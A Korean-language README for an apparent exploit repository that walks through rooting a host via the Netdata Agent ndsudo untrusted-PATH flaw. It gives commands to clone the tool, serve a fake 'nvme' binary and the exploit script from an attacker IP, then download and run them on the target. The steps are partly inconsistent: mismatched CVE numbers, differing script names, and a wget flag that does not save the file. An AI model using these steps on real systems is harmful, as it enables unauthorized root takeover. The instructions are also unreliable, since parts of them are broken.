
# CVE-2024-32020 Netdata Agent ndsudo 권한 상승 익스플로잇 Netdata Agent의 ndsudo 도구에서 CVE-2024-32019를 악용하는 Bash 기반 권한 상승 익스플로잇으로, 신뢰할 수 없는 PATH 검색을 활용하여 루트 권한으로 임의 바이너리를 실행합니다.
ndsudo 취약점은 Netdata Agent의 일부인 ndsudo 도구에서 신뢰할 수 없는 검색 경로를 악용하여 공격자가 root 권한을 획득할 수 있게 합니다. 공격자가 쓰기 가능한 디렉터리에 악성 바이너리를 배치하고 PATH 환경 변수를 그에 맞게 조작하면 상승된 권한으로 임의의 프로그램을 실행할 수 있습니다.
CVE-2024-32019로 식별되는 ndsudo 취약점은 Netdata Agent에 포함된 ndsudo 도구의 v1.45.0 이하 버전에 영향을 미칩니다. 이 취약점으로 인해 해당 도구가 설치된 시스템에서 공격자가 권한을 상승시킬 수 있습니다.
취약점이 작동하는 방식:
악용 메커니즘:-
신뢰할 수 없는 검색 경로: ndsudo 도구는 외부 명령을 찾기 위해 PATH 환경 변수를 사용합니다. 공격자는 이 변수를 자신이 제어하는 디렉터리를 가리키도록 조작할 수 있습니다.
악성 바이너리 실행: ndsudo가 실행을 허용하는 명령(예: nvme)과 동일한 이름의 악성 실행 파일을
쓰기 가능한 디렉터리에 배치함으로써, 공격자는 root 권한으로 임의의 코드를 실행할 수 있습니다.
공격 복잡도:-
취약점의 영향:-
권한 상승: 성공적으로 악용하면 공격자가 root 접근 권한을 획득할 수 있으며, 이는 영향을 받는 시스템에 대한 완전한 제어로 이어질 수 있습니다.
잠재적 위험: 이로 인해 승인되지 않은 데이터 접근, 시스템 조작, 네트워크 리소스의 추가 악용이 발생할 수 있습니다.
권한 상승
나는 사용자에서 root로 손쉽게 접근 권한을 얻기 위한 두 개의 bash 스크립트를 만들었습니다. 아래에 설명된 단계를 따르세요 :-
git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git
cd CVE-2024-32019-ndsudo
chmod +x ndsudo_exp.sh
이제 python 서버를 생성하세요 :
python3 -m http.server 8080
ndsudo_exploit.sh 파일을 gedit 또는 pluma(사용 가능한 편집기)로 여세요. 다음과 같은 wget 명령어를 볼 수 있을 것입니다 :
wget http://10.10.14.70:8080/nvme -o /tmp/nvme
IP 주소를 자신의 머신 IP로 변경하세요.
이제 대상 머신으로 이동하여 터미널을 열고 다음을 수행하세요:
wget http://<your-ip-addr>:8080/ndsudo_exploit.sh
chmod +x ndsudo_exploit.sh
./ndsudo_exploit.sh